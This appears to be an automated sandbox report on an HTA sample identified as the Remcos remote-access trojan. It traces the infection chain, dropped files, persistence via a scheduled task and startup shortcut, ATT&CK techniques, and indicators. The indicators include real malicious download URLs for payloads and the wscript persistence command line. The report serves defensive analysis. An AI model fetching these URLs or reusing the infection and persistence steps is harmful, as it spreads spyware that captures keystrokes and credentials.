Source: LinkHub.com.28.drBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_11WIN_10WIN_2022WIN_2019WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\AppearanceUSERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYRegDeleteKeyExWadvapi32.dll+.-.\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs](*UCP)\XISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGGETCOUNTSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXPANDmsctls_statusbar321tooltips_class32%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----@GUI_DRAGID@GUI_DROPID@GUI_DRAGFILEError text not found (please report)Q\EDEFINEUTF16)UTF)UCP)NO_AUTO_POSSESS)NO_START_OPT)LIMIT_MATCH=LIMIT_RECURSION=CR)LF)CRLF)ANY)ANYCRLF)BSR_ANYCRLF)BSR_UNICODE)argument is not a compiled regular expressionargument not compiled in 16 bit modeinternal error: opcode not recognizedinternal error: missing capturing bracketfailed to get memory
Source: LinkHub.comBinary or memory string: WIN_XPe
Source: LinkHub.comBinary or memory string: WIN_VISTA
Source: LinkHub.comBinary or memory string: WIN_7
Source: LinkHub.comBinary or memory string: WIN_8

Remote Access Functionality

barindex
Detected Remcos RAT
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.comMutex created: \Sessions\1\BaseNamedObjects\Rmc-3QMI88
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comCode function: 36_2_00282263 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,36_2_00282263
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comCode function: 36_2_00281C61 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket,36_2_00281C61
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comCode function: 38_2_00F52263 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,38_2_00F52263
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comCode function: 38_2_00F51C61 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket,38_2_00F51C61

Mitre Att&ck Matrix

ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity Information111
Scripting		2
Valid Accounts		1
Windows Management Instrumentation		111
Scripting		1
Exploitation for Privilege Escalation		2
Disable or Modify Tools		121
Input Capture		2
System Time Discovery		Remote Services1
Archive Collected Data		2
Ingress Tool Transfer		Exfiltration Over Other Network Medium1
System Shutdown/Reboot
CredentialsDomainsDefault Accounts1
Native API		1
DLL Side-Loading		1
DLL Side-Loading		1
Deobfuscate/Decode Files or Information		LSASS Memory1
Account Discovery		Remote Desktop Protocol1
Email Collection		11
Encrypted Channel		Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain Accounts1
Command and Scripting Interpreter		2
Valid Accounts		2
Valid Accounts		2
Obfuscated Files or Information		Security Account Manager3
File and Directory Discovery		SMB/Windows Admin Shares121
Input Capture		1
Non-Standard Port		Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal Accounts1
Scheduled Task/Job		1
Scheduled Task/Job		21
Access Token Manipulation		1
DLL Side-Loading		NTDS28
System Information Discovery		Distributed Component Object Model3
Clipboard Data		1
Remote Access Software		Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud Accounts2
PowerShell		2
Registry Run Keys / Startup Folder		12
Process Injection		111
Masquerading		LSA Secrets221
Security Software Discovery		SSHKeylogging2
Non-Application Layer Protocol		Scheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts1
Scheduled Task/Job		2
Valid Accounts		Cached Domain Credentials121
Virtualization/Sandbox Evasion		VNCGUI Input Capture13
Application Layer Protocol		Data Transfer Size LimitsService Stop
DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup Items2
Registry Run Keys / Startup Folder		121
Virtualization/Sandbox Evasion		DCSync4
Process Discovery		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job21
Access Token Manipulation		Proc Filesystem11
Application Window Discovery		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt12
Process Injection		/etc/passwd and /etc/shadow1
System Owner/User Discovery		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1589232 Sample: c2.hta Startdate: 11/01/2025 Architecture: WINDOWS Score: 100 93 ecIUYmCipwWZXGGOIZYONyVhLKgCF.ecIUYmCipwWZXGGOIZYONyVhLKgCF 2->93 95 candwfarmsllc.com 2->95 97 4 other IPs or domains 2->97 105 Suricata IDS alerts for network traffic 2->105 107 Antivirus detection for URL or domain 2->107 109 Sigma detected: Remcos 2->109 111 11 other signatures 2->111 13 mshta.exe 1 2->13         started        16 wscript.exe 2->16         started        18 wscript.exe 2->18         started        signatures3 process4 signatures5 123 Suspicious powershell command line found 13->123 20 powershell.exe 15 16 13->20         started        125 Windows Scripting host queries suspicious COM object (likely to drop second stage) 16->125 25 LinkHub.com 16->25         started        27 LinkHub.com 18->27         started        process6 dnsIp7 99 myguyapp.com 193.26.115.39, 443, 49732, 49734 QUICKPACKETUS Netherlands 20->99 79 C:\Users\user\AppData\Local\Temp\c2.bat, ASCII 20->79 dropped 119 Drops large PE files 20->119 121 Powershell drops PE file 20->121 29 cmd.exe 3 2 20->29         started        32 conhost.exe 20->32         started        file8 signatures9 process10 signatures11 127 Suspicious powershell command line found 29->127 129 Drops PE files with a suspicious file extension 29->129 131 Uses schtasks.exe or at.exe to add and modify task schedules 29->131 34 msword.exe 29->34         started        37 powershell.exe 29->37         started        40 powershell.exe 16 29->40         started        42 2 other processes 29->42 process12 file13 101 Multi AV Scanner detection for dropped file 34->101 44 cmd.exe 34->44         started        81 C:\Users\user\AppData\Local\...\msword.exe, PE32 37->81 dropped 103 Loading BitLocker PowerShell Module 37->103 83 C:\Users\user\AppData\Local\Temp\msword.zip, Zip 40->83 dropped 85 C:\Users\user\Downloads\W2.pdf, PDF 42->85 dropped 47 AcroCEF.exe 107 42->47         started        signatures14 process15 file16 87 C:\Users\user\AppData\Local\...\Propose.com, PE32 44->87 dropped 49 Propose.com 44->49         started        54 conhost.exe 44->54         started        56 tasklist.exe 44->56         started        60 9 other processes 44->60 58 AcroCEF.exe 47->58         started        process17 dnsIp18 91 geoplugin.net 178.237.33.50, 49830, 80 ATOM86-ASATOM86NL Netherlands 49->91 73 C:\Users\user\AppData\Local\...\LinkHub.com, PE32 49->73 dropped 75 C:\Users\user\AppData\Local\...\LinkHub.js, ASCII 49->75 dropped 77 C:\ProgramData\remcos\logs.dat, data 49->77 dropped 113 Detected Remcos RAT 49->113 115 Drops PE files with a suspicious file extension 49->115 117 Installs a global keyboard hook 49->117 62 cmd.exe 49->62         started        65 cmd.exe 49->65         started        file19 signatures20 process21 file22 89 C:\Users\user\AppData\Roaming\...\LinkHub.url, MS 62->89 dropped 67 conhost.exe 62->67         started        69 conhost.exe 65->69         started        71 schtasks.exe 65->71         started        process23

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
c2.hta11%ReversingLabsWin32.Trojan.Generic

Dropped Files

SourceDetectionScannerLabelLink
C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com0%ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.com0%ReversingLabs
C:\Users\user\AppData\Local\Temp\msword\msword.exe16%ReversingLabsWin32.Backdoor.Generic

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

SourceDetectionScannerLabelLink
https://candwfarmsllc.com0%Avira URL Cloudsafe
https://myguyapp.com/msword.zipurl2=https://myguyapp.com/W2.pdfUSERDOMAIN=MQAWXUYUSERDOMAIN_ROAMINGP100%Avira URL Cloudphishing
https://myguyapp.com/msword.zipurl2=https://myguyapp.com/W2.pdfUSERDOMAIN=MQAWXUYUSERDOMAIN_ROA100%Avira URL Cloudphishing
https://myguyapp.com/mt100%Avira URL Cloudphishing
https://candwfarmsllc.c0%Avira URL Cloudsafe
https://candwfarmsllc.com/c2.bat100%Avira URL Cloudmalware
https://myguyapp.com/W2.pdf9100%Avira URL Cloudphishing
https://myguyapp.com/msw100%Avira URL Cloudphishing
https://myguyapp.com/W2.pdfG100%Avira URL Cloudphishing
https://myguyapp.com/msword.zipqD100%Avira URL Cloudphishing
https://myguyapp.com/W2.pdfsD100%Avira URL Cloudphishing
https://myguyapp.com/W2.pdf100%Avira URL Cloudphishing
http://candwfarmsllc.com0%Avira URL Cloudsafe
https://myguyapp.com/msword.zipur100%Avira URL Cloudphishing
https://myguyapp.com/W2.p100%Avira URL Cloudphishing
https://myguyapp.com/msword.zipbN100%Avira URL Cloudphishing
https://myguyapp.com/W2.pdfUSERDOMAIN=MQAWXUYUSERD100%Avira URL Cloudphishing

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
candwfarmsllc.com
193.26.115.39
truetrue
    		unknown
    geoplugin.net
    		178.237.33.50
    		truefalse
      		high
      me-work.com
      		193.26.115.39
      		truefalse
        		high
        myguyapp.com
        		193.26.115.39
        		truefalse
          		high
          x1.i.lencr.org
          		unknown
          		unknownfalse
            		high
            ecIUYmCipwWZXGGOIZYONyVhLKgCF.ecIUYmCipwWZXGGOIZYONyVhLKgCF
            		unknown
            		unknowntrue
              		unknown

              Contacted URLs

              NameMaliciousAntivirus DetectionReputation
              https://myguyapp.com/msword.zipfalse
                		high
                https://candwfarmsllc.com/c2.battrue
                • Avira URL Cloud: malware
                		unknown
                http://geoplugin.net/json.gpfalse
                  		high
                  https://myguyapp.com/W2.pdftrue
                  • Avira URL Cloud: phishing
                  		unknown

                  URLs from Memory and Binaries

                  NameSourceMaliciousAntivirus DetectionReputation
                  https://candwfarmsllc.cmshta.exe, 00000000.00000003.1701548408.0000000005F11000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1702282615.0000000005F12000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.1704093551.0000000005F12000.00000004.00000020.00020000.00000000.sdmptrue
                  • Avira URL Cloud: safe
                  		unknown
                  http://nuget.org/NuGet.exepowershell.exe, 00000002.00000002.1695865250.0000000005C9B000.00000004.00000800.00020000.00000000.sdmpfalse
                    		high
                    http://x1.i.lencr.org/2D85F72862B55C4EADD9E66E06947F3D0.8.drfalse
                      		high
                      https://myguyapp.com/mswcmd.exe, 00000004.00000003.1682580513.000000000345D000.00000004.00000020.00020000.00000000.sdmptrue
                      • Avira URL Cloud: phishing
                      		unknown
                      https://myguyapp.com/mttasklist.exe, 00000013.00000003.2065519734.000000000321A000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 00000013.00000002.2068918634.000000000321A000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: phishing
                      		unknown
                      https://myguyapp.com/msword.zipqDcmd.exe, 0000001E.00000002.2092302096.0000000002B3A000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: phishing
                      		unknown
                      http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000002.00000002.1693219999.0000000004D86000.00000004.00000800.00020000.00000000.sdmpfalse
                        		high
                        http://crl.microsoftpowershell.exe, 00000002.00000002.1690664991.0000000002D56000.00000004.00000020.00020000.00000000.sdmpfalse
                          		high
                          http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000002.00000002.1693219999.0000000004D86000.00000004.00000800.00020000.00000000.sdmpfalse
                            		high
                            https://go.micropowershell.exe, 00000002.00000002.1693219999.000000000541F000.00000004.00000800.00020000.00000000.sdmpfalse
                              		high
                              https://myguyapp.com/W2.pdf9tasklist.exe, 00000013.00000003.2065519734.000000000321A000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 00000013.00000002.2068918634.000000000321A000.00000004.00000020.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: phishing
                              		unknown
                              https://contoso.com/Licensepowershell.exe, 00000002.00000002.1695865250.0000000005C9B000.00000004.00000800.00020000.00000000.sdmpfalse
                                		high
                                https://contoso.com/Iconpowershell.exe, 00000002.00000002.1695865250.0000000005C9B000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high
                                  https://myguyapp.com/msword.zipurl2=https://myguyapp.com/W2.pdfUSERDOMAIN=MQAWXUYUSERDOMAIN_ROAPropose.com, 0000001C.00000003.2087736160.00000000001A4000.00000004.00000020.00020000.00000000.sdmp, Propose.com, 0000001C.00000003.2087958038.00000000001A4000.00000004.00000020.00020000.00000000.sdmp, Propose.com, 0000001C.00000003.2087599132.00000000001A4000.00000004.00000020.00020000.00000000.sdmp, Propose.com, 0000001C.00000003.2087186951.00000000001A4000.00000004.00000020.00020000.00000000.sdmp, Propose.com, 0000001C.00000003.2087243889.00000000001A5000.00000004.00000020.00020000.00000000.sdmp, Propose.com, 0000001C.00000003.2094480482.00000000001A4000.00000004.00000020.00020000.00000000.sdmp, Propose.com, 0000001C.00000003.2087370625.00000000001A4000.00000004.00000020.00020000.00000000.sdmp, Propose.com, 0000001C.00000003.2087769877.00000000001A4000.00000004.00000020.00020000.00000000.sdmp, Propose.com, 0000001C.00000003.2094550176.00000000001A4000.00000004.00000020.00020000.00000000.sdmp, Propose.com, 0000001C.00000003.2087286049.00000000001A4000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: phishing
                                  		unknown
                                  http://www.autoitscript.com/autoit3/XPropose.com, 0000001C.00000003.2088771240.00000000038CA000.00000004.00000800.00020000.00000000.sdmp, Propose.com, 0000001C.00000000.2081554510.0000000000485000.00000002.00000001.01000000.00000010.sdmp, LinkHub.com, 00000024.00000000.2103224867.00000000002D5000.00000002.00000001.01000000.00000012.sdmp, LinkHub.com, 00000026.00000000.2206840035.0000000000FA5000.00000002.00000001.01000000.00000012.sdmp, LinkHub.com.28.drfalse
                                    		high
                                    http://nsis.sf.net/NSIS_ErrorErrormsword.exe, 00000010.00000002.2049587628.0000000000408000.00000002.00000001.01000000.0000000D.sdmp, msword.exe, 00000010.00000000.2027567502.0000000000408000.00000002.00000001.01000000.0000000D.sdmp, msword.exe.13.drfalse
                                      		high
                                      https://myguyapp.com/W2.pdfGtasklist.exe, 00000013.00000003.2065519734.000000000321A000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 00000013.00000002.2068918634.000000000321A000.00000004.00000020.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: phishing
                                      		unknown
                                      https://myguyapp.com/msword.zipurl2=https://myguyapp.com/W2.pdfUSERDOMAIN=MQAWXUYUSERDOMAIN_ROAMINGPcmd.exe, 00000021.00000002.2095752286.00000000032C0000.00000004.00000020.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: phishing
                                      		unknown
                                      https://www.autoitscript.com/autoit3/Propose.com, 0000001C.00000003.2336994406.0000000000509000.00000004.00000020.00020000.00000000.sdmp, Propose.com, 0000001C.00000003.2088771240.00000000038CA000.00000004.00000800.00020000.00000000.sdmp, Protocol.24.dr, LinkHub.com.28.drfalse
                                        		high
                                        https://github.com/Pester/Pesterpowershell.exe, 00000002.00000002.1693219999.0000000004D86000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		high
                                          https://candwfarmsllc.compowershell.exe, 00000002.00000002.1693219999.0000000004E55000.00000004.00000800.00020000.00000000.sdmptrue
                                          • Avira URL Cloud: safe
                                          		unknown
                                          https://myguyapp.com/W2.pcmd.exe, 00000004.00000002.2028777650.000000000348E000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000003.2007892523.0000000003472000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000003.2008095310.000000000348C000.00000004.00000020.00020000.00000000.sdmptrue
                                          • Avira URL Cloud: phishing
                                          		unknown
                                          https://myguyapp.com/W2.pdfsDcmd.exe, 0000001E.00000002.2092302096.0000000002B3A000.00000004.00000020.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: phishing
                                          		unknown
                                          https://aka.ms/pscore6lBdqpowershell.exe, 00000002.00000002.1693219999.0000000004C31000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            http://candwfarmsllc.compowershell.exe, 00000002.00000002.1693219999.0000000004FC2000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            https://contoso.com/powershell.exe, 00000002.00000002.1695865250.0000000005C9B000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high
                                              https://nuget.org/nuget.exepowershell.exe, 00000002.00000002.1695865250.0000000005C9B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		high
                                                https://myguyapp.com/msword.zipurtasklist.exe, 00000015.00000003.2072466480.0000000002D39000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 00000015.00000003.2072688924.0000000002D3C000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 00000015.00000003.2072595675.0000000002D39000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 00000015.00000002.2073717534.0000000002D3D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: phishing
                                                		unknown
                                                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000002.00000002.1693219999.0000000004C31000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		high
                                                  https://myguyapp.com/W2.pdfUSERDOMAIN=MQAWXUYUSERDtasklist.exe, 00000015.00000002.2073447449.0000000002C00000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: phishing
                                                  		unknown
                                                  https://myguyapp.com/msword.zipbNcmd.exe, 00000021.00000002.2096003879.0000000003410000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: phishing
                                                  		unknown

                                                  World Map of Contacted IPs

                                                  • No. of IPs < 25%
                                                  • 25% < No. of IPs < 50%
                                                  • 50% < No. of IPs < 75%
                                                  • 75% < No. of IPs

                                                  Public IPs

                                                  IPDomainCountryFlagASNASN NameMalicious
                                                  178.237.33.50
                                                  		geoplugin.netNetherlands
                                                  		8455ATOM86-ASATOM86NLfalse
                                                  193.26.115.39
                                                  		candwfarmsllc.comNetherlands
                                                  		46261QUICKPACKETUSfalse

                                                  General Information

                                                  Joe Sandbox version:42.0.0 Malachite
                                                  Analysis ID:1589232
                                                  Start date and time:2025-01-11 22:52:06 +01:00
                                                  Joe Sandbox product:CloudBasic
                                                  Overall analysis duration:0h 10m 5s
                                                  Hypervisor based Inspection enabled:false
                                                  Report type:full
                                                  Cookbook file name:default.jbs
                                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                  Number of analysed new started processes analysed:40
                                                  Number of new started drivers analysed:0
                                                  Number of existing processes analysed:0
                                                  Number of existing drivers analysed:0
                                                  Number of injected processes analysed:0
                                                  Technologies:
                                                  • HCA enabled
                                                  • EGA enabled
                                                  • AMSI enabled
                                                  Analysis Mode:default
                                                  Analysis stop reason:Timeout
                                                  Sample name:c2.hta
                                                  Detection:MAL
                                                  Classification:mal100.troj.spyw.expl.evad.winHTA@70/98@8/2
                                                  EGA Information:
                                                  • Successful, ratio: 100%
                                                  HCA Information:
                                                  • Successful, ratio: 98%
                                                  • Number of executed functions: 91
                                                  • Number of non-executed functions: 298
                                                  Cookbook Comments:
                                                  • Found application associated with file extension: .hta

                                                  Warnings

                                                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                  • Excluded IPs from analysis (whitelisted): 2.16.168.105, 2.16.168.107, 184.28.88.176, 162.159.61.3, 172.64.41.3, 3.219.243.226, 52.6.155.20, 52.22.41.97, 3.233.129.217, 23.209.209.135, 2.16.164.72, 2.16.164.97, 2.16.164.67, 2.19.11.117, 2.19.11.122, 184.28.90.27, 18.213.11.84, 20.109.210.53, 23.217.172.185, 4.175.87.197, 13.107.246.45
                                                  • Excluded domains from analysis (whitelisted): e4578.dscg.akamaiedge.net, chrome.cloudflare-dns.com, fs.microsoft.com, e8652.dscx.akamaiedge.net, slscr.update.microsoft.com, otelrules.azureedge.net, acroipm2.adobe.com.edgesuite.net, ctldl.windowsupdate.com.delivery.microsoft.com, ctldl.windowsupdate.com, p13n.adobe.io, a767.dspw65.akamai.net, acroipm2.adobe.com, fe3cr.delivery.mp.microsoft.com, download.windowsupdate.com.edgesuite.net, ocsp.digicert.com, armmf.adobe.com, ssl-delivery.adobe.com.edgekey.net, a122.dscd.akamai.net, geo2.adobe.com, wu-b-net.trafficmanager.net, crl.root-x1.letsencrypt.org.edgekey.net
                                                  • Not all processes where analyzed, report is missing behavior information
                                                  • Report size exceeded maximum capacity and may have missing behavior information.
                                                  • Report size exceeded maximum capacity and may have missing disassembly code.
                                                  • Report size getting too big, too many NtCreateKey calls found.
                                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                  • Report size getting too big, too many NtQueryValueKey calls found.
                                                  • Report size getting too big, too many NtSetInformationFile calls found.
                                                  • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                                                  Simulations

                                                  Behavior and APIs

                                                  TimeTypeDescription
                                                  16:52:57API Interceptor1x Sleep call for process: mshta.exe modified
                                                  16:52:57API Interceptor95x Sleep call for process: powershell.exe modified
                                                  16:53:12API Interceptor2x Sleep call for process: AcroCEF.exe modified
                                                  16:53:35API Interceptor1x Sleep call for process: msword.exe modified
                                                  16:54:38API Interceptor70x Sleep call for process: Propose.com modified
                                                  21:53:40Task SchedulerRun new task: Murray path: wscript s>//B "C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.js"
                                                  21:53:42AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LinkHub.url

                                                  Joe Sandbox View / Context

                                                  IPs

                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                  178.237.33.50c2.htaGet hashmaliciousRemcosBrowse
                                                  • geoplugin.net/json.gp
                                                  I1ahLI8fId.exeGet hashmaliciousRemcosBrowse
                                                  • geoplugin.net/json.gp
                                                  yPIOW6yoPi.exeGet hashmaliciousRemcosBrowse
                                                  • geoplugin.net/json.gp
                                                  bwYw3UUfy7.exeGet hashmaliciousRemcosBrowse
                                                  • geoplugin.net/json.gp
                                                  1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                  • geoplugin.net/json.gp
                                                  Material Requirments.pif.exeGet hashmaliciousRemcos, PureLog StealerBrowse
                                                  • geoplugin.net/json.gp
                                                  preliminary drawing.pif.exeGet hashmaliciousRemcos, PureLog StealerBrowse
                                                  • geoplugin.net/json.gp
                                                  DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exeGet hashmaliciousRemcosBrowse
                                                  • geoplugin.net/json.gp
                                                  z58Swiftcopy_MT.bat.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                  • geoplugin.net/json.gp
                                                  173634822473cd620521fcc8b42a4aac25bbd1c3f6e30c324045b1411f9747e93f432d0281839.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                  • geoplugin.net/json.gp
                                                  193.26.115.39c2.htaGet hashmaliciousRemcosBrowse
                                                    c2.htaGet hashmaliciousRemcosBrowse
                                                      c2.htaGet hashmaliciousRemcosBrowse
                                                        RailProvides_nopump.exeGet hashmaliciousRemcosBrowse
                                                          c2.htaGet hashmaliciousRemcosBrowse
                                                            9W9jJCj9EV.batGet hashmaliciousRemcosBrowse
                                                              c2.htaGet hashmaliciousRemcosBrowse
                                                                c2.htaGet hashmaliciousRemcosBrowse

                                                                  Domains

                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                  me-work.comc2.htaGet hashmaliciousRemcosBrowse
                                                                  • 193.26.115.39
                                                                  c2.htaGet hashmaliciousRemcosBrowse
                                                                  • 193.26.115.39
                                                                  c2.htaGet hashmaliciousRemcosBrowse
                                                                  • 193.26.115.39
                                                                  RailProvides_nopump.exeGet hashmaliciousRemcosBrowse
                                                                  • 193.26.115.39
                                                                  c2.htaGet hashmaliciousRemcosBrowse
                                                                  • 193.26.115.39
                                                                  c2.htaGet hashmaliciousRemcosBrowse
                                                                  • 193.26.115.39
                                                                  c2.htaGet hashmaliciousXWormBrowse
                                                                  • 193.26.115.21
                                                                  c2.htaGet hashmaliciousXWormBrowse
                                                                  • 193.26.115.21
                                                                  c2.htaGet hashmaliciousXWormBrowse
                                                                  • 193.26.115.21
                                                                  c2.htaGet hashmaliciousXWormBrowse
                                                                  • 87.120.117.152
                                                                  candwfarmsllc.comc2.htaGet hashmaliciousRemcosBrowse
                                                                  • 193.26.115.39
                                                                  c2.htaGet hashmaliciousRemcosBrowse
                                                                  • 193.26.115.39
                                                                  myguyapp.comc2.htaGet hashmaliciousRemcosBrowse
                                                                  • 193.26.115.39
                                                                  c2.htaGet hashmaliciousRemcosBrowse
                                                                  • 193.26.115.39
                                                                  c2.htaGet hashmaliciousRemcosBrowse
                                                                  • 193.26.115.39
                                                                  c2.htaGet hashmaliciousRemcosBrowse
                                                                  • 193.26.115.39
                                                                  c2.htaGet hashmaliciousRemcosBrowse
                                                                  • 193.26.115.39
                                                                  c2.htaGet hashmaliciousXWormBrowse
                                                                  • 193.26.115.21
                                                                  c2.htaGet hashmaliciousXWormBrowse
                                                                  • 193.26.115.21
                                                                  c2.htaGet hashmaliciousXWormBrowse
                                                                  • 193.26.115.21
                                                                  EeSNugjFh5.batGet hashmaliciousUnknownBrowse
                                                                  • 193.26.115.21
                                                                  c2.htaGet hashmaliciousXWormBrowse
                                                                  • 193.26.115.21
                                                                  geoplugin.netc2.htaGet hashmaliciousRemcosBrowse
                                                                  • 178.237.33.50
                                                                  I1ahLI8fId.exeGet hashmaliciousRemcosBrowse
                                                                  • 178.237.33.50
                                                                  yPIOW6yoPi.exeGet hashmaliciousRemcosBrowse
                                                                  • 178.237.33.50
                                                                  bwYw3UUfy7.exeGet hashmaliciousRemcosBrowse
                                                                  • 178.237.33.50
                                                                  1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                                  • 178.237.33.50
                                                                  Material Requirments.pif.exeGet hashmaliciousRemcos, PureLog StealerBrowse
                                                                  • 178.237.33.50
                                                                  preliminary drawing.pif.exeGet hashmaliciousRemcos, PureLog StealerBrowse
                                                                  • 178.237.33.50
                                                                  DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exeGet hashmaliciousRemcosBrowse
                                                                  • 178.237.33.50
                                                                  z58Swiftcopy_MT.bat.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                                  • 178.237.33.50
                                                                  173634822473cd620521fcc8b42a4aac25bbd1c3f6e30c324045b1411f9747e93f432d0281839.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                                  • 178.237.33.50

                                                                  ASNs

                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                  ATOM86-ASATOM86NLc2.htaGet hashmaliciousRemcosBrowse
                                                                  • 178.237.33.50
                                                                  I1ahLI8fId.exeGet hashmaliciousRemcosBrowse
                                                                  • 178.237.33.50
